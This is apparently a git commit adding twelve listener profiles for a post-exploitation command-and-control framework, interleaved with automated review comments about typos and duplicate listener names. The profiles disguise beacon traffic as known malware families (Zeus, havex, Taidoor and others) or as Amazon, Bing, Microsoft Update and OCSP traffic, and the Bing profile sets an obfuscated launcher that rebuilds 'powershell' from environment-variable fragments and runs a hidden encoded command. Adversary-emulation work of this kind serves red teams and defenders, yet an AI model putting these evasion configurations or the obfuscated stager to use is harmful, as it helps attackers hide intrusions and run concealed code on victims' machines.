Update Profile

master
root 2018-07-06 13:33:33 +07:00
parent 552c496890
commit d396f5a4ac
12 changed files with 141 additions and 0 deletions


@ -0,0 +1,11 @@
# Basic comfoo profile
# http://www.secureworks.com/cyber-threat-intelligence/threats/secrets-of-the-comfoo-masters/
# https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/APT/comfoo.profile
listeners
uselistener http
set Name comfoo
set DefaultDelay 30
Set DefaultJitter 20
set DefaultProfile /CWoNaJLBo/VTNeWw11212/|Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1)|Keep-Alive:timeout=15, max=90|Accept:image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*|Accept-Language:en-en|Connection:Keel-Alive|Cache-Control:no-cache
set Headers Server:Apache/2.0.50 (Unix)|Keep-Alive:timeout=15, max=90
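Review bot: `Set DefaultJitter 20` on the line before `set DefaultProfile` uses a capitalised `Set` while every other command in this file is lower-case `set`; if the listener command parser is case-sensitive the jitter value is silently left at its default. The same capitalisation appears in the havex, Pitty Tiger, Taidoor, Fiesta, Zeus and OCSP profiles added by this commit, so `set DefaultJitter 20` should be used consistently in each. `Connection:Keel-Alive` in the DefaultProfile value appears to be carried over from the referenced upstream comfoo profile rather than introduced here; a comment such as `# NOTE: "Keel-Alive" (sic) mirrors the upstream profile - confirm before changing` would record that intent, and if it is not intentional it should read `Keep-Alive`.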


@ -0,0 +1,10 @@
# havex trojan C&C profile
# https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/APT/havex.profile
listeners
uselistener http
set Name havex
set DefaultDelay 30
Set DefaultJitter 0
set DefaultProfile /include/template/isx.php,/wp06/wp-includes/po.php,/wp08/wp-includes/dtcla.php,/modules/mod_search.php,/blog/wp-includes/pomo/src.php,/includes/phpmailer/class.pop3.php|Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2) Java/1.5.0_08|Referer:http://www.google.com|Accept:text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
set Headers Server:Apache/2.2.26 (Unix)|X-Powered-By:PHP/5.3.28|Cache-Control:no-cache|Content-Type:text/html|Keep-Alive:timeout=3, max=100


@ -0,0 +1,11 @@
# Basic Pitty Tiger RAT profile
# http://bitbucket.cassidiancybersecurity.com/whitepapers/downloads/Pitty%20Tiger%20Final%20Report.pdf
# https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/APT/pitty_tiger.profile
listeners
uselistener http
set Name ocsp
set DefaultDelay 30
Set DefaultJitter 20
set DefaultProfile /FC001/JOHN|Microsoft Internet Explorer|Host:newb02.skypetm.com.tw|Connection:keep-alive
set Headers Content-Type:text/html|Server:IIS5.0
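Review bot: `set Name ocsp` on the third command line does not match this file's Pitty Tiger header and is the same listener name the OCSP profile later in this commit sets, so loading both profiles yields two listeners with one name. This looks like a copy-paste leftover; suggest `set Name pittytiger` here and keep `ocsp` for the OCSP profile.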


@ -0,0 +1,11 @@
# Taidoor Profile
#
# https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/APT/taidoor.profile
listeners
uselistener http
set Name taidoor
set DefaultDelay 40
Set DefaultJitter 35
set DefaultProfile /login.jsp,/parse.jsp,/page.jsp,/default.jsp,/index.jsp,/process.jsp,/security.jsp,/user.jsp|Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)|Connection:Keep-Alive|Cache-Control:no-cache
set Headers Server:Microsoft-IIS/5.0|Content-Type:text/html|Connection:close


@ -0,0 +1,11 @@
# Fiesta Exploit Kit traffic profile
# http://malware-traffic-analysis.net/2014/04/05/index.html
# https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/crimeware/fiesta.profile
listeners
uselistener http
set Name fiesta
set DefaultDelay 30
Set DefaultJitter 10
set DefaultProfile /rmvk30g/|Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_11|Acccept:text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
set Headers Server:Apache/2.2.15 (CentOS)|X-Powered-By:PHP/5.3.27|Content-Type:application/octet-stream|Connection:close
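Review bot: `Acccept:` in the DefaultProfile line is spelled with three c's, so the header name in the client profile is not `Accept`. If this deliberately reproduces the referenced traffic capture, record that with a comment such as `# NOTE: "Acccept" (sic) is taken from the referenced capture - confirm before changing`; otherwise correct it to `Accept:`.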


@ -0,0 +1,11 @@
# Basic Zeus variant profile
# https://malwr.com/analysis/NjIwNTU2ODA2OTUxNDcwNmJiMTMzYzk4YzU4NWQyZDQ/
# https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/crimeware/zeus.profile
listeners
uselistener http
set Name zeus
set DefaultDelay 30
Set DefaultJitter 5
set DefaultProfile /metro91/admin/1/ppptp.jpg,/metro91/admin/1/secure.php|Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)|Host:mahamaya1ifesciences.com|Cache-Control:no-cache|Accept-Encoding: deflate, gzip;q=1.0, *;q=0.5|Accept:*/*
set Headers Server:nginx/1.0.4|Content-Type:text/html|Connection:close|X-Powered-By:PHP/5.3.8-1~dotdeb.2
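Review bot: `Accept-Encoding: deflate, gzip;q=1.0, *;q=0.5` in the DefaultProfile line has a space after the colon while most other `Name:Value` pairs in this commit have none; if the profile string is split on the first `:` the value carries a leading space. Use `Accept-Encoding:deflate, gzip;q=1.0, *;q=0.5` to match the surrounding pairs, or document the separator convention once if the parser trims whitespace.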


@ -0,0 +1,13 @@
# Amazon browsing traffic profile
#
# https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/normal/amazon.profile
#
# Author: Rahmat Nurfauzi - @infosecn1nja
listeners
uselistener http
set Name amazon
set DefaultJitter 0
set DefaultDelay 5
set DefaultProfile /s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=book,/N4215/adj/amzn.us.sr.aps?sz=160x600&oe=oe&sn=91191&s=3717&dc_ref=http%3A%2F%2Fwww.amazon.com|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko|host:www.amazon.com|accept:*/*
set Headers Server:Server|x-amz-id-1:THKUYEZKCKPGY5T42PZT|x-amz-id-2:a21yZ2xrNDNtdGRsa212bGV3YW85amZuZW9ydG5rZmRuZ2tmZGl4aHRvNDVpbgo=|X-Frame-Options:SAMEORIGIN|x-ua-compatible: IE=edge


@ -0,0 +1,14 @@
# Bing Web Search
#
# https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/normal/bingsearch_getonly.profile
#
# Author: Rahmat Nurfauzi - @infosecn1nja
listeners
uselistener http
set Name bing
set DefaultJitter 20
set DefaultDelay 6
set DefaultProfile /search?q=news&qs=n&form=QBLH,/search?q=sport&qs=n&form=QBLH,/search?q=health&qs=n&form=QBLH|Mozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko|Host:www.bing.com|Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
set Headers Server:Microsoft-IIS/8.5|Cache-Control:private, max-age=0|Content-Type:text/html; charset=utf-8|Vary:Accept-Encoding
set Launcher CmD.ExE /c start %allusersprofile:~3,1%%allusersprofile:~5,1%%windir:~3,1%%localappdata:~5,2%%windir:~9,1%he%localappdata:~-1%%localappdata:~-1% -nOP -STa -w 1 -ec


@ -0,0 +1,13 @@
# Microsoft Update
#
# https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/normal/microsoftupdate_getonly.profile
#
# Author: Rahmat Nurfauzi - @infosecn1nja
listeners
uselistener http
set Name microsoftupdate
set DefaultJitter 20
set DefaultDelay 6
set DefaultProfile /c/msdownload/update/others/2013/11/9946821_f5082b842c8abc5c47cfc68f98340ec384b69fa9.cab,/c/msdownload/update/software/ftpk/2013/11/ie-spelling-nl_3576e6450352dfc0c0892bf62384e75a56d780a7.msu|Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40|Host:download.windowsupdate.com|Accept:*/*"
set Headers Content-Type:application/vnd.ms-cab-compressed|Server:Microsoft-IIS/8.5|MSRegion:N. America|Connection:keep-alive|X-Powered-By:ASP.NET
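Review bot: The DefaultProfile line ends with a stray double quote, `Accept:*/*"`, which no other profile in this commit has and which would become part of the Accept header value. Drop it so the line ends `|Accept:*/*`.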


@ -0,0 +1,12 @@
#
# Online Certificate Status Protocol (OCSP) Profile
# http://tools.ietf.org/html/rfc6960
#
listeners
uselistener http
set Name ocsp
set DefaultDelay 20
Set DefaultJitter 20
set DefaultProfile /oscp/,/oscp/a|Microsoft-CryptoAPI/6.1|Accept:*/*|host:ocsp.verisign.com
set Headers content-type:application/ocsp-response|content-transfer-encoding:binary|cache-control:max-age=547738, public, no-transform, must-revalidate|connection:keep-alive


@ -0,0 +1,11 @@
# Standard Pandora traffic profile
#
# https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/normal/pandora.profile#L11
listeners
uselistener http
set Name bing
set DefaultJitter 0
set DefaultDelay 1
set DefaultProfile /access?version=4&lid=1582502724|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko|Accept:*/*|GetContentFeatures.DLNA.ORG:1|Host:audio-sv5-t1-3.pandora.com
set Headers Server:Apache|Cache-Control:no-cache, no-store, must-revalidate, max-age=-1|Pragma:no-cache, no-store|Connection:close|Content-Type:audio/mp4
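Review bot: `set Name bing` does not match this Pandora profile and duplicates the name used by the Bing Web Search profile in the same commit, so loading both gives two listeners with the same name. The file header and the `Host:audio-sv5-t1-3.pandora.com` value both indicate the intended name; suggest `set Name pandora`.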


@ -0,0 +1,13 @@
#
# Safebrowsing Comms profile
# https://code.google.com/p/google-safe-browsing/wiki/SafeBrowsingDesign
#
# Author: Rahmat Nurfauzi - @infosecn1nja
listeners
uselistener http
set Name safebrowsing
set DefaultJitter 20
set DefaultDelay 60
set DefaultProfile /safebrowsing/rd/CltOb12nLW1IbHehcmUtd2hUdmFzEBAY7-0KIOkUDC7h2,/safebrowsing/rd/CltOb12nLW1IbHehcmUtd2hUdmFzEBAY7-0KIOkUDC7h2|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko|Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8|Accept-Language:en-US,en;q=0.5|Accept-Encoding:gzip, deflate
set Headers Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8|Accept-Language:en-US,en;q=0.5|Accept-Encoding:gzip, deflate